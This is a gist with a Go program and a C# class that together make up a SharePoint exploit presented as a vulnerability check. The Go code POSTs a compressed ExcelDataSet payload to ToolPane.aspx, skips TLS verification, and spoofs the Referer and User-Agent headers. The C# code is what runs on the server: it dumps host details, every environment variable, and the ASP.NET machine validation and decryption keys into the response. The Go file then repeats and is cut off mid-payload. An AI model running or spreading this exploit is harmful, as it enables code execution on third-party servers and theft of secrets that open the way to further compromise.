gboddin/spcheck.go Secret

## spcheck.go
package main

import (
	"crypto/tls"
	"fmt"
	"io"
	"net/http"
	"os"
	"strings"
)
// See zinfo.cs for what the compiled code is about

var infoLeakPayload = `MSOTlPn_Uri=https%3A%2F%2F127.0.0.1/_controltemplates/15/AclEditor.ascx&MSOTlPn_DWP=%3C%25%40+Register+TagPrefix%3D%22Scorecard%22+Namespace%3D%22Microsoft.PerformancePoint.Scorecards%22+Assembly%3D%22Microsoft.PerformancePoint.Scorecards.Client%2C+Version%3D16.0.0.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D71e9bce111e9429c%22+%25%3E%3CScorecard%3AExcelDataSet+CompressedDataTable%3D%22H4sIAAAAAAAAC%2B1cW5PayJKe2cuJOHv2bf%2BAw68z4%2BZqNxP2RJSEJBCXbnERoBMTsUiiBY0EmJuAx%2F0lG7E%2FdPfLLDUIutv2%2BJyxd3atjqZ0qcrKyltlZpX03ffffffdf%2BOgko5%2F%2FQf8NNv71XoUvSoP18MfX9ij5Woyn70rvMrQ348v1E243ixH72ajzXo5DH98cbtxw4lXG%2B078%2Blo9s5982ZY9Iqvs6V8YZS5Lv0zAf%2B3FEz%2BaY%2FW1Nef%2B1HY9sajaPgXnJUnd3fGchh9%2Fz09%2B9M%2F4ue%2F%2Fvx2t%2Fp5xVVe7KJwtnr38qU8%2BXmH8%2FF6vfj56iqO41dx%2FtV8GVzlMpnsVb9Rl2Af6kYrH72%2Be7lZzhJoq5%2Biibecr%2BZ365%2B8efQz6v0ka718MfHfvVzNoxFdrUbrl7%2F8y4vkIGxG4SgazdYvZsNodF7vhQTwc3WVjPHdy%2FVyMzre765G6ma5ROP63BuGo%2BTxCfxDF0BoEY52nf1idP7wWGE8n3ijF9FkduN5myUokUEvw93D1Wbmzjczf%2BRfAH9%2BHOPR%2BBKT34TVZeXV6P1mNPM%2BUvNpXBbx7EgzoiT1%2BO5lIkPqPAxH3hpCuXpljGaj5cR7VZ%2Bs1v%2Be%2Fetf02LWHi23oNHqVXW2Hi1nw%2FCVtlsMiSa95XCxGC3%2FPXds0Bu5r7rVV%2FX5Sp8vo%2BEaDX58cXr2OWqQyd8V797cZbN%2BMTPMD3%2F98djXZObP45VE8sa9x1jo9HY530586vd2OVqBFkMaog51GMXz5fQzUMhn3bv8dfH10M%2B%2FLozyxV9%2FPY7pjEB%2FByX%2F9deXL9bMJPByONsTw16eS%2BfVR0Tm6pNkhqt9VA65ViJST%2BjP1VGBLjTvWeCPAUp82ZL88qd%2FgqX6j%2F%2F8%2Fq0PAxYsf5bFMPos2yPbSBAfa%2FPQ0U%2FbbNpGpUzSxQBJyV8kWJKR6wzd8GSelvP4ZgkRZGOS1BoPV%2Bp4OAtGYOJkthot10%2FalLdQ2aNZnnzcLv8EWOshWH0y5v4nWPNn2H2h2Dd3aUV%2BrGJfANEXH8FUk7L0jFK8BaaE9MjHCQa03mc%2BoBKN0Xo895swFL%2BUYTmWk2E4OYzeXqXuf6zx7ZDsDIi1%2BoiWJrr9JSgI4D8%2F2BT%2F59V6OZkFL3%2B5irX9pKIJYQkhbq9wXCs4S45YpV872yx6%2BVbotov9Ya84dfP%2BoT51tl6UPdRVpef0zcOwV9rcdqxNQy3E9XuxqmrNrFtpZb2oW3IjO%2BtXzLGrxkG3Yk9cI7xv5%2ByibZSWTq9QGtx7%2BUHHvm92BrubTiPjdEThxuoyHlX7A31P9ULbKB18dd3xDT3jWBiHEK1uxdx6hr33K6E66Pkq2o292bQigio9N0VMxXWZfncHj3p5ZvwWn9%2Bdxl92c7uV02tmaLzevlhxesXQi8L7%2BnS3QJ2gYa%2Fdbj48%2BIa9rk9Lk2Fk3%2FsYt9tv3rt5czXsVVdV3Qm9WXPh5gqlpqQX6BYHVt5e%2BRV773SyG6dvZ7xIX4G%2Blt%2Bjds260w%2B7bm4duvfZSfPgj5u9RrZ5rxUbh1bYKAdFNOExKWFpQf17sX3n5cLXjjW%2B8yN7j%2FOtG3RRI6iqFtOiRj9qQI0E85opKKYMR7WIKMJUuJga8h7RS5hcWUxNeW8u7zFdpw36LVuDiqSzJunJMDxVtTJ0AnTxa%2BidUb%2BZcXqZjZ0r7Yc5Z%2BXmvY2VK609o7QBbTOdXmnq9OK%2FA80yh0bPjBqHINuM9GnjMICcNbIKj1F5f%2BRZ6EO21pFrlPL1aXPr9pUt5Hfja9mtY9iretgkfo8hw68H%2FRbhs7FIHvrOAvLW8fvm3s35Y8DqOL1dOMi3tt5kfTvALIjz1PPuspMz35MsdXP2ftjTV8P%2BInR0M3SknGqAFzvWeu30shPomIb%2Bxl7c0CsnebTdKMyM7EucilXI6dTpV28kf66ZP5K3ms4yIvnX4uct7k9RgiOjTE3ykoQFt5jn3Fxt8S1T57paNQWrL5%2FzA0W1TrAMKT9DCWuegrXi5xWJVz0Fy5fPC%2FxACvXuKCuQj5VrQK8MyPOssWkb%2BmFYaY0H0S5UGO9Fw83p01ako05pr2SPslOVsqXvQRuL22lN4qvlRaXcsNcKvWBcHfSb8y7rTYvk56CEztit2KFHsOOGUKwuROwD%2BHRZbsYedM7Un7Ud5tP936%2B6neBKMBnnNalD0zumR5uJc1tmegqip9qx3%2BOqcaQp7JcQdW58UrvfcMiWhbtNUBBrMWtW3UCBSR7bxnjh7ZUYeM6gY%2Buq0Ry7UXHrq8rEaSt7v1cIhvhvaaVO1SBd6W7KVqbGBoIPxWoBmQ6xs2k27nInHAVJ6QT8tyAPCosU2xoez4Rl9ySZcqCyMX5TxlqKNx%2FSOiW1cDSEVe3Kysqp8rFBCggfNWuLmyzPXKkWJACfOBhTZtLffNDILztS6YYWXNwsZpz%2BmA2pInGX2si%2FTL%2BL%2BoznBjqwH8Sn8Uh68q%2FU87NDEqs%2BM0PYwnuRCFnCGfWMSamDoFkX6MqjHNQfyCQRBYyuqKkAW4FSPebC5x%2FKKlaEInUICGlWdU4sUicBc1MNBkUnJjo5W5rb1OiahlJTomsyRTU3poaLPbX1xKrizWD%2FKmJONk2dFxf3DFib07wJmGS3amrs79dUv1In2YlrYorb8znZLtShebZWE2Tv5nUlXz%2FIOsTC%2BSM4RqxhpgxuZJu5rEP4B8AlWimESzl%2BCm7NhcsS15iS7xvMpPajvneyjvaBOmZLBFSn%2BiR%2BecxPwK%2FzJH7juEz40STzGD%2B4DTGNW17XFBK7xZbmEnXcqNT2cUvJXZPe1RY8Z2kN4As%2FQom1oDonJqnjqlpTJG2NNF47reLuGO56XyrYmuVnpTfYqGpWsFJ2WtXdkQAuPW89ZRwrxM8gY3qzgSYqyrYi8dA0q7U%2FgPmecj13d4THvKO0NF1Xhk0W8N41CUDNVwaEY0cJvI7auq7fs%2F%2BpddSxVtPHmjmnMl%2FPQRZjOjcUzXD3TPeJZs0dbxzooqLS%2BVCznG2V%2Bp%2FHNH6F6%2BerAwW8ovMKt208tPVTbUfUluys%2Br7aUsfXZurZHXBBO6Lz%2Bwbr6xB1JkHENCsVyua6IB7kHrSfnenBnoY5N9yY5v%2FFtkb0Wss2tUBRSABYFcoZkrgiXfqkYszX1FGFzIoyTwU22yc2JQ6NU1YgOipZgjWKz59bYbNmEczE%2BLMvUBlk2P87iEOjQ7JAFRV2JjoEX23%2BgJ8CwVsTLLXZQfyxcCMfeofDiIkUHul%2BNWujCcsQ91DN%2BHa7S6fqgGSaB6U2VdjASWpA%2BNcrOkrp55Rfm52GYJ%2BI3UnGSZpyBnVxnbg%2FCbDaaSYaYOoR6Gcg7EDkqPS5nIv3QoVPRGZMlq%2B5HACIxvVNS5a1WJbL5P4%2BkOW1VRkJayB0q87lTVK2ktITVa4XBjVNBAOxSK5XlrzeCllmYirn4iqoh1RWg1sunZjKgXhvNR7o9GDPUTL%2FLKGwH6nLa0VGIEI1DDAVNgZqohG3boh%2BDaZLUqoa%2BAgUUWYCMSZ65i15v2SJSJTJI9BqojwFcA1DR7sAHizKG0vLUWkJ7Zqetyy9TKWdlMOkvAv0CpVTS5azWN7fCr1OZSbQLSqvLN0WhgY6m0OBuHktlDtRIXgml30quX%2F9np47sfleVDVxJ6o1USW45obK95aZIY98b5mvRQ3jCWqqqGugzI1JZTO%2BaVLZCuR1L7kfxDdtOS6jT%2BOOrBufylncwPg1sbBQQvTVWC1SqcVlVdSqiVv1%2BAhPQpk6NCF99seTshaT3KWO8q7p5lpZ1%2Bj%2BICgWj7Jzx3BW9ai1coWiCyN7GCC2Q2wyEQ%2B%2BsKUk8ZAl6lEz4%2Bar4hR%2FmVl3hhim103iwHCF2KeDf%2FjHiHNiBX50Nh72dmP2t0PyT%2FRCEvccrH4LMWA48futUOgPsGxuQ3UGUYg4q1U8q5fC%2B4gj8g1OryraFdSDjw444QgThpOzM%2F1MM%2BuRXzSz5HMdeM0QY4Q2fPsd4sCprJdN7gfA2bDH3hQxeFTaC22c8StK2%2Bk3Y8LZsZSZ02%2FddSP7QHGvl%2BsKK4fYsV8VrV4xN%2BybiEGz3F8LcDtGaQZajF2ttUfcSTQx8ezQgKsu7ZwnWujH7ekZQbhHzbEvlJqbCzfC8ENfLzUHveYceZGwA1%2F%2B2H%2FCg5YR7ilOQb6imNQvU9xK8fgTzyh2ucdYDrhXdvOIlYWEZyPPM8w0tz7aJXVtD7Fu0uct5WiYb5H%2FEEsl9C117GO%2B4pRfSmCcrp%2BLrUAP4CnjsUjfjyylAnx0d%2BYsgOsG8rDxdQfxWcgx46P6XTzvZRFT6yybRHPwIYt2hO8W%2FDQvrrVh0vegbxbxLIN8UzKWdYj%2BJT2Qm%2FB7XYGcRs7pFlme2t0W8kbK1svpyIt1BfAgGSCZOMaXkIvoGF9i3vXyzdBFfgNwOc4VeqvoUVv0Z3POQGmivzn00nQjZys0kgmmswFdmWG8RI%2BkjgV8ILdGaWpFOvULWXK2Q8hgKicSDiZE42I07PnI6ek8VqFlx4PcGHBtipOR75A0eODTALrgIC9H9yjfd1H%2F7PlTbZJ7GuDuR33lBOeJ%2BxewH%2Bk755ESPiQ5ALQDXQzkT7ocrwo7byJvBjpGu6yH%2BBR8nArNLgxydixpD3tX6a6FmhF1C6b%2FN5Qwv8CxgPkHzhFHPspeGNeY1JRQVKoCOrMQ6Bs5huBz4KMkP6LUCeBHGRkxCCRcWP6tMAZUNqg%2FJ6Z%2BGmJA%2FhLwaDEeU%2FgZVL8hbgL0X1lh3lVK5GeIcoh2U%2BClZKi%2BGysRlR2G62H%2BVO5pPnTJE9TgMweAXxkI0PogyvAPhPKGnLY7xk%2BUb%2BBTmZkGwVnDBxe%2BBbg0buoX9AFea7p%2BhIdWMkB79CPxBt3GAvqDJEjA4%2BL6dI1x0PNYKdJ4QFfYd6I%2FnAoaB43T4Ptbos%2FIIleK%2FE64VhUMETyuAz%2FgtafnGMeG4KK99qnt7W6B2mMc3H6fppuX8H0QS3oDT4bDfMd99zQO0LFB%2FQKORvXn1D%2F0P3xMV%2BXuA3xfczuim%2BQj4w98oF%2BW7Bf9gI%2B4bgBfeQ3bciA8gP86oSf4hLg0QPmof1VMsiS7sm%2FgOCZcGNYTvAFtDkeeG49pDVyLTLNExhzGmXmAa9CWSoKDMIng8H3IEtMaOEpdKqDdE2N5LJOlDuJLiU8iU0wLeMQCIQ7mcjl2yB6NR2fZ3ic0Y3weyaraPdN1O%2BEJ4CwSHj%2BSmaBKfttn6T30BrgFSi6RT8YJPlYoaSVxhl6xnqOcIP6R%2BgkcPqO%2FNY%2BxpT%2FQ8DWP3UrGXlXd7oXu1QPk0kC%2FQYDA%2F2l6lLBgQGlLhDcF8vk3BBtBGcbG8rEivrCcAM4t86crbQfgSFsWE78sshHQAZZ16Eyd6oH%2FXepnyHJUoPYTgt8gnSx3ST7zpCsNS%2BxIzpoW8IAc4fkYumV%2FYDzg84MuDUgeZtR%2FSo6YF6jffKTD2op4UBQ66RxsaKq%2BUMMKj4%2ByexW2GQ%2FjOYNrke0gOSebC3kVqv5J42d5hS2mpPKb4L7iqM7dm8zrDOa%2BTnVYng6hauv8wrPH00yhOi1j7lIUFaGAFWAnTunublex1fs5Ba1tzUK2T6naeA63dkr3%2FDKtMQWFm4qQZRlxIV9bBQrfbzgXRzGHUl1QfKFNMgyrIWFlxZ7SbWgTo40SU%2F9Y0YEBnnZvlDaV0xuyqto0c6PZGqxs1asoGY%2FalQOCofuMT4%2FWOrSbSivGQoWmlMeDirqrtspjrQRY7XbLbGrhtN1smQq1Ryx9DMornHMA3cZOH%2F5O3IHf2OqP4edKfwP58D2tRXLo1IiR80sdNwW%2BfibkepwPfeJAjLH1poih4Ncgry6S9cPQaWMNFPrLx%2B0129NU4vvb8Y0CfyAKUL4DBy08PqksSd6PrMZzz7ngBeyB9ZD%2FSx245nUSzDkdoV9TqQsd%2BQbEfJQSgt%2FE%2BRqUBl3zUc9ob65o7fEZzSon9ahX%2Fn0KOU6wkw3pJX6TkfhhsP08B0Rkk%2FlAEpHhwHzz3AEbjblxdfJleI5MDjVWaljeoK4xd%2BA5z%2BuANxMaz0Fo1xVtniMHmJsIvUDWpzmPFqtkCZ%2BmKjOtlOik%2FFuqPeIC9k8xhzB8zEEZ7ofmOnkwRg0ePOWpCE%2F2KzBengMPF%2FXP53aa63HcCtGk9oyv9NHQH8cBq3Q8INjHw3gDug6QHCb6xTS3wq%2BPKf7gg51RwEN8grnOS%2BDwHA1fi%2F0jnivhi7JcyJV2pPaIBeD%2F8TnTj%2BKaFN%2BM345PM6HPQ7yHevDTmW9P0umMPpJeNFXQoIAf5CiWvrOb%2BHGjZ3zS5%2Bj97fg%2FRgFeEJGslQu0345vFPhfSQGN1qwRIp%2F2fPWKvGcK%2BdwF5f1GSV4Re%2FpW2BOzl2Ld4n1Pqm1vKI8n85u7Uw60WxxjrYDWmKrKhKbc8g%2FitGewgRz3rj495nMpx7q0c2OcH%2FdnIS9sr4ED54LbWA%2BQeV8zaITpvXxmEaXbb3%2BhvXzt3alvrHE4EeMq95sh1057wtzKdFVNra%2F8bnsx0UT6OQNe2%2BuEqbw7YpLfrd%2BWXJiSe7qSPYnBVC6mBnKTHHIOVYrbqBqmcRzsUxkm7%2Bfsqif%2B7RbuTNsc8%2Fbgg9Ne94eQMwf75zi%2FrqXlxDbRTub3I7HvZddP5%2BMnxZMsfg3ZoD2KxoNsFLEn1g9Ba%2BwnpH1oZ%2BM535sa8prBF5MfwF57OcS00W4xmMTBcX3nPiPX8qkvVSn7vV0Ga03hLdamsDYHPtHeTyUL3VwMaC3FbmFtwt7c9qr5Zk7LDg7dHPYAHJpGN74po0myZ5X2UsBjaqfkRy66B9P5s%2FITn%2BSH9jqI5nX595Cfy%2F2CWLfZsA3EnsAz%2BD2xS7dj2%2FelZMzOfCHZyKx6n7S%2FOjzaadrTOSjrbqpdF%2BtA4ReTsS%2FHAymzbRZVizfuIhI77cmem%2FWjDPOBTQQc69Eu%2BCS8gmBPKNQpRyL8PebFT7I%2Fst3%2FA%2FtT17%2Bavp7LSpCSFT6fsnVTO9qDnIijHZR7kni%2FK%2FtoYoBMKnLD8Wl%2FfscIN167eCYTtaw%2Fx3mI%2Feuss2e2qxtmTrpqfjVdTfPjYb%2F9V5qLBqm5qJLMRdnn5iK5%2F0bORU1qr4apdyXsST20TV6XJ%2F2btfawm4d6qIyx52Dawtr2wMa%2Bi75570gcjCb1q2XPYfxd9E0cnHs7auYGu0bPyjYM7TBo8d70h7Hy2I7yJnhPKO1bS%2F0nyS35PoC0Wffs5i3O7MzluxhT2KRcOIMPpmH%2FycLJYa4IoV8RNlwxDJrqFfMI4%2FfzU1nRpE3OqGqHxwFeNlLvxWh%2BSr%2BwVgb34rR%2FpU17ZIawleTru70SzoszjHk%2B6BU3sMf0rtPMofx%2FTs842DOS2Ft6rykZK%2BV8lPqXsDWawvklnmdUi%2FlkVXhc8v0qfp9ITJnPmpyY%2BFeRqGJ5lEtNvjxkHmWyBZ46veTdmediQoY9xt6PnaSF5a%2BTfSxYTW3EJ3kBXQ17Bv8rTL1fI%2FeMTceYsyA7k%2FUJDs1VFbNYP9mpttNzjr5IfYr9Vz0z9KbhxolKz%2BKndiUNgA0NUb4YxaMOpX3u8ryMhTkmHj%2BWr8xgzY8O3lTLm8dRlx%2BYbWmfdylYUoe6LGcK1iuPsGTzsClh8fOkX%2BaZ2ZExNfOjcZK%2FEx2ef5domeIP5oEW9lV5qfeUxuPTviQng31Q2GtjtX161%2BZhX1JXP2D%2F1xr2s1ietbD%2FivbxkB9g3wwg%2Byr2uPnGeOtoHNM3nUf9aQr2eWId8m%2FnM7K5pI12KldgQAfvL%2BYqdQS4vexX8YUv5O9Euy83f01%2FSOYpLpWQZXv4CXkJQGA54%2F1patDi2P1v1S05n7RYVsraiR5yPyH2fBm4l2HZMbs0L6A9jV8NeW4YS5tXrWG%2FG9rZe5bJlnKMMSzILPmrkDWs65KcQXXioHnusyIHZIWsZmpH6pRUU0RrdPEJ%2FKtqu%2B2gZ82tGXwke%2B3XLId9r3r46W0f56WSeTbQWd%2FlOzgO%2BxwHkbKxM3szyH3LZ%2FxR4olLHVRt%2BX5cj3VhTPs42Z%2F24rlC79fRWheJoXx%2B3qbPfuj4PD6B%2FFW1ox0%2B1NSp0Y8%2Fqd6DvBkpeePfddD8oLx9y398y398Ykxr3sr3YJPS4fzzWOh%2FNFky%2BL1LkU32oZ%2FyWNAf9vukvxjep%2BeVgRwzvaslWvbn5cgu5i6pw9rZ%2FvY55p%2BZfBfkN9JV5ja%2FJl2DR3vzJ8FChhxzbBUjeyhtHwekDbjBx3nTybpR81su6xNzJ1ZUgi9tj93JV9P99%2FRbCZ9%2Fn%2F78nQxnybqEXIEf2Tf0vjR0zUzp2jKta0PZB%2B%2FB0KbmFrDDQa8QpN7VID3hfX3GSRdVF3ri9PRNNdVPam6speZG7nVrfdgX%2B4Po3deIh75sjv8y9pnx2%2FlaKl78Y6xVWA6%2F86rmzt%2FjgmzWU7pwSOuCJ%2BU1dyHrjHf14n0w8hd99hfDC1lM3rXJ0ztvmG%2FUk13upOzyiO3yQPmgXf6iawVnMvfwnuIXW6dIeFBLSmPEPvvpXbDkWzMsV8qM8zs3FvKClP9o94qglw6b0q2JLq35KHLNvC%2B%2FsyLtaPhaynPhIr%2F68K0ipQx%2BUc7FdGfNDPKP9077IhZoT427%2BDwn%2FZBbBw0gF5RnwXpBvjUGL8Oafi5DNWkQgWPhlO%2FlTJmIPjHfS%2B93rYHbtN2VH31SOwzAkvktmYMLuBvk1uVHDvhXPfG24vfCqczNmncDC%2F8B%2FmPzzsG1g2sH1w6uh7ge4nqI6%2BHFLjpVePRdKaSw%2Bb%2BjlczMm8kSm1a2b0StbJaxS1yNV%2B%2FeXiWf%2BnruC3uf9uGwt%2FLra9XkE2Cpj3qlP9H28pe3V%2BcVLz%2FM96EPor29%2Bo3ff3vqk4D4ft1ln%2FSxvHQvjz6r9%2Fbq4oN%2Fv%2FzlfwCdHyNKU1UAAA%3D%3D%22+DataTable-CaseSensitive%3D%22false%22+runat%3D%22server%22%3E+%3C%2FScorecard%3AExcelDataSet%3E`

func init() {
	// We don't need security where we're going
	http.DefaultTransport = &http.Transport{
		TLSClientConfig: &tls.Config{
			InsecureSkipVerify: true,
		},
	}
}

func main() {
	if len(os.Args) < 2 {
		fmt.Println("Usage: " + os.Args[0] + " <url>")
		os.Exit(1)
	}
	spUrl := strings.TrimSuffix(os.Args[1], "/")
	// Replace lkx with your favorite string, or don't
	req, err := http.NewRequest("POST", spUrl+"/_layouts/15/toolpane.aspx/lkx?DisplayMode=Edit&lkx=/ToolPane.aspx", strings.NewReader(infoLeakPayload))
	if err != nil {
		panic(err)
	}
	// Says some guy hitting everything he can finds on the net
	req.Header.Set("Referer", "/_layouts/./SignOut.aspx")
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	// I'm a real browser, I swear
	req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0")
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		fmt.Println("Request failed: " + err.Error())
		os.Exit(1)
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(io.LimitReader(resp.Body, 32*1024))
	if err != nil {
		fmt.Println("Request failed during body read: " + err.Error())
		os.Exit(1)
	}
	if strings.Contains(string(body), "Number of Logical Drives") {
		bodyParts := strings.Split(string(body), "--------------------")
		if len(bodyParts) == 5 {
			fmt.Println("Service vulnerable, retrieved information:")
			fmt.Println(string(body))
			os.Exit(0)
		}
	}
	fmt.Println("Not vulnerable")
	os.Exit(1)
}

## zinfo.cs
using System;
using System.Collections;
using System.Reflection;
using System.Web;
using System.Web.Configuration;

#nullable disable
public class E
{
  public E()
  {
    try
    {
      HttpContext current = HttpContext.Current;
      if (current == null)
        return;
      current.Server.ClearError();
      current.Response.Clear();
      string s = "-------------------- .NET Properties --------------------\n" + $"Number of Logical Drives: {Environment.GetLogicalDrives().Length}\n" + $"List of Logical Drives: {string.Join(";", Environment.GetLogicalDrives())}\n" + $"Computer Name: {Environment.MachineName}\n" + $"Full path of the system directory: {Environment.SystemDirectory}\n" + $"Current Directory: {Environment.CurrentDirectory}\n" + $"Number of processors on this machine: {Environment.ProcessorCount}\n" + $"Number of milliseconds since system start: {Environment.TickCount}\n" + $"Username of the user currently logged onto the operating system: {Environment.UserName}\n" + $"Operating System Version: {Environment.OSVersion}\n" + $".NET Version: {Environment.Version}\n" + "\n-------------------- Environment Variables --------------------\n";
      foreach (DictionaryEntry environmentVariable in Environment.GetEnvironmentVariables())
        s += $"{environmentVariable.Key}:{environmentVariable.Value}\n";
      try
      {
        MachineKeySection machineKeySection = (MachineKeySection) Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a").GetType("System.Web.Configuration.MachineKeySection").GetMethod("GetApplicationConfig", BindingFlags.NonPublic | BindingFlags.Static).Invoke((object) null, new object[0]);
        s = $"{s}PublicKeyToken: {machineKeySection.ValidationKey}|{(object) machineKeySection.Validation}|{machineKeySection.DecryptionKey}|{machineKeySection.Decryption}|{(object) machineKeySection.CompatibilityMode}";
      }
      catch (Exception ex)
      {
      }
      current.Response.Write(s);
      current.Response.Flush();
      current.Response.End();
    }
    catch (Exception ex)
    {
    }
  }
}
	package main

	import (
	"crypto/tls"
	"fmt"
	"io"
	"net/http"
	"os"
	"strings"
	)
	// See zinfo.cs for what the compiled code is about

	var infoLeakPayload = `MSOTlPn_Uri=https%3A%2F%2F127.0.0.1/_controltemplates/15/AclEditor.ascx&MSOTlPn_DWP=%3C%25%40+Register+TagPrefix%3D%22Scorecard%22+Namespace%3D%22Microsoft.PerformancePoint.Scorecards%22+Assembly%3D%22Microsoft.PerformancePoint.Scorecards.Client%2C+Version%3D16.0.0.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D71e9bce111e9429c%22+%25%3E%3CScorecard%3AExcelDataSet+CompressedDataTable%3D%22H4sIAAAAAAAAC%2B1cW5PayJKe2cuJOHv2bf%2BAw68z4%2BZqNxP2RJSEJBCXbnERoBMTsUiiBY0EmJuAx%2F0lG7E%2FdPfLLDUIutv2%2BJyxd3atjqZ0qcrKyltlZpX03ffffffdf%2BOgko5%2F%2FQf8NNv71XoUvSoP18MfX9ij5Woyn70rvMrQ348v1E243ixH72ajzXo5DH98cbtxw4lXG%2B078%2Blo9s5982ZY9Iqvs6V8YZS5Lv0zAf%2B3FEz%2BaY%2FW1Nef%2B1HY9sajaPgXnJUnd3fGchh9%2Fz09%2B9M%2F4ue%2F%2Fvx2t%2Fp5xVVe7KJwtnr38qU8%2BXmH8%2FF6vfj56iqO41dx%2FtV8GVzlMpnsVb9Rl2Af6kYrH72%2Be7lZzhJoq5%2Biibecr%2BZ365%2B8efQz6v0ka718MfHfvVzNoxFdrUbrl7%2F8y4vkIGxG4SgazdYvZsNodF7vhQTwc3WVjPHdy%2FVyMzre765G6ma5ROP63BuGo%2BTxCfxDF0BoEY52nf1idP7wWGE8n3ijF9FkduN5myUokUEvw93D1Wbmzjczf%2BRfAH9%2BHOPR%2BBKT34TVZeXV6P1mNPM%2BUvNpXBbx7EgzoiT1%2BO5lIkPqPAxH3hpCuXpljGaj5cR7VZ%2Bs1v%2Be%2Fetf02LWHi23oNHqVXW2Hi1nw%2FCVtlsMiSa95XCxGC3%2FPXds0Bu5r7rVV%2FX5Sp8vo%2BEaDX58cXr2OWqQyd8V797cZbN%2BMTPMD3%2F98djXZObP45VE8sa9x1jo9HY530586vd2OVqBFkMaog51GMXz5fQzUMhn3bv8dfH10M%2B%2FLozyxV9%2FPY7pjEB%2FByX%2F9deXL9bMJPByONsTw16eS%2BfVR0Tm6pNkhqt9VA65ViJST%2BjP1VGBLjTvWeCPAUp82ZL88qd%2FgqX6j%2F%2F8%2Fq0PAxYsf5bFMPos2yPbSBAfa%2FPQ0U%2FbbNpGpUzSxQBJyV8kWJKR6wzd8GSelvP4ZgkRZGOS1BoPV%2Bp4OAtGYOJkthot10%2FalLdQ2aNZnnzcLv8EWOshWH0y5v4nWPNn2H2h2Dd3aUV%2BrGJfANEXH8FUk7L0jFK8BaaE9MjHCQa03mc%2BoBKN0Xo895swFL%2BUYTmWk2E4OYzeXqXuf6zx7ZDsDIi1%2BoiWJrr9JSgI4D8%2F2BT%2F59V6OZkFL3%2B5irX9pKIJYQkhbq9wXCs4S45YpV872yx6%2BVbotov9Ya84dfP%2BoT51tl6UPdRVpef0zcOwV9rcdqxNQy3E9XuxqmrNrFtpZb2oW3IjO%2BtXzLGrxkG3Yk9cI7xv5%2ByibZSWTq9QGtx7%2BUHHvm92BrubTiPjdEThxuoyHlX7A31P9ULbKB18dd3xDT3jWBiHEK1uxdx6hr33K6E66Pkq2o292bQigio9N0VMxXWZfncHj3p5ZvwWn9%2Bdxl92c7uV02tmaLzevlhxesXQi8L7%2BnS3QJ2gYa%2Fdbj48%2BIa9rk9Lk2Fk3%2FsYt9tv3rt5czXsVVdV3Qm9WXPh5gqlpqQX6BYHVt5e%2BRV773SyG6dvZ7xIX4G%2Blt%2Bjds260w%2B7bm4duvfZSfPgj5u9RrZ5rxUbh1bYKAdFNOExKWFpQf17sX3n5cLXjjW%2B8yN7j%2FOtG3RRI6iqFtOiRj9qQI0E85opKKYMR7WIKMJUuJga8h7RS5hcWUxNeW8u7zFdpw36LVuDiqSzJunJMDxVtTJ0AnTxa%2BidUb%2BZcXqZjZ0r7Yc5Z%2BXmvY2VK609o7QBbTOdXmnq9OK%2FA80yh0bPjBqHINuM9GnjMICcNbIKj1F5f%2BRZ6EO21pFrlPL1aXPr9pUt5Hfja9mtY9iretgkfo8hw68H%2FRbhs7FIHvrOAvLW8fvm3s35Y8DqOL1dOMi3tt5kfTvALIjz1PPuspMz35MsdXP2ftjTV8P%2BInR0M3SknGqAFzvWeu30shPomIb%2Bxl7c0CsnebTdKMyM7EucilXI6dTpV28kf66ZP5K3ms4yIvnX4uct7k9RgiOjTE3ykoQFt5jn3Fxt8S1T57paNQWrL5%2FzA0W1TrAMKT9DCWuegrXi5xWJVz0Fy5fPC%2FxACvXuKCuQj5VrQK8MyPOssWkb%2BmFYaY0H0S5UGO9Fw83p01ako05pr2SPslOVsqXvQRuL22lN4qvlRaXcsNcKvWBcHfSb8y7rTYvk56CEztit2KFHsOOGUKwuROwD%2BHRZbsYedM7Un7Ud5tP936%2B6neBKMBnnNalD0zumR5uJc1tmegqip9qx3%2BOqcaQp7JcQdW58UrvfcMiWhbtNUBBrMWtW3UCBSR7bxnjh7ZUYeM6gY%2Buq0Ry7UXHrq8rEaSt7v1cIhvhvaaVO1SBd6W7KVqbGBoIPxWoBmQ6xs2k27nInHAVJ6QT8tyAPCosU2xoez4Rl9ySZcqCyMX5TxlqKNx%2FSOiW1cDSEVe3Kysqp8rFBCggfNWuLmyzPXKkWJACfOBhTZtLffNDILztS6YYWXNwsZpz%2BmA2pInGX2si%2FTL%2BL%2BoznBjqwH8Sn8Uh68q%2FU87NDEqs%2BM0PYwnuRCFnCGfWMSamDoFkX6MqjHNQfyCQRBYyuqKkAW4FSPebC5x%2FKKlaEInUICGlWdU4sUicBc1MNBkUnJjo5W5rb1OiahlJTomsyRTU3poaLPbX1xKrizWD%2FKmJONk2dFxf3DFib07wJmGS3amrs79dUv1In2YlrYorb8znZLtShebZWE2Tv5nUlXz%2FIOsTC%2BSM4RqxhpgxuZJu5rEP4B8AlWimESzl%2BCm7NhcsS15iS7xvMpPajvneyjvaBOmZLBFSn%2BiR%2BecxPwK%2FzJH7juEz40STzGD%2B4DTGNW17XFBK7xZbmEnXcqNT2cUvJXZPe1RY8Z2kN4As%2FQom1oDonJqnjqlpTJG2NNF47reLuGO56XyrYmuVnpTfYqGpWsFJ2WtXdkQAuPW89ZRwrxM8gY3qzgSYqyrYi8dA0q7U%2FgPmecj13d4THvKO0NF1Xhk0W8N41CUDNVwaEY0cJvI7auq7fs%2F%2BpddSxVtPHmjmnMl%2FPQRZjOjcUzXD3TPeJZs0dbxzooqLS%2BVCznG2V%2Bp%2FHNH6F6%2BerAwW8ovMKt208tPVTbUfUluys%2Br7aUsfXZurZHXBBO6Lz%2Bwbr6xB1JkHENCsVyua6IB7kHrSfnenBnoY5N9yY5v%2FFtkb0Wss2tUBRSABYFcoZkrgiXfqkYszX1FGFzIoyTwU22yc2JQ6NU1YgOipZgjWKz59bYbNmEczE%2BLMvUBlk2P87iEOjQ7JAFRV2JjoEX23%2BgJ8CwVsTLLXZQfyxcCMfeofDiIkUHul%2BNWujCcsQ91DN%2BHa7S6fqgGSaB6U2VdjASWpA%2BNcrOkrp55Rfm52GYJ%2BI3UnGSZpyBnVxnbg%2FCbDaaSYaYOoR6Gcg7EDkqPS5nIv3QoVPRGZMlq%2B5HACIxvVNS5a1WJbL5P4%2BkOW1VRk